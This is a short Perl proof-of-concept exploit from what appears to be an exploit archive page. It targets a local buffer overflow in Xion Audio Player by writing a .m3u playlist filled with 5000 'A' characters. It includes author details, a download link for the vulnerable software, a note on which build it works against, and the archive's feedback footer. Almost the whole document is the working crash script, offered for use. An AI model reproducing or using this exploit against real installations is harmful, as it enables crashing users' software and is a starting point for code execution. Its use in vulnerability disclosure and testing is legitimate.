#!/usr/bin/perl
#
# SecurityReason Note :
# Please note that the exploit works for new version 1.0 (build 121)
# For version 1.0 (build 100) dont work.
#
#
#=====================================
#Xion Audio Player(.m3u File) Local buffer Overflow PoC
#download:http://www.brothersoft.com/xion-audio-player-download-49404.html
#=====================================
#Author:Dragon Rider
#contact:drag0n.rider(at)hotmail.com
#=====================================
#tested on WinXp SP3
my $crash = "\x41" x 5000;
open(myfile,'>>DragonR.m3u');
print myfile $crash;
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.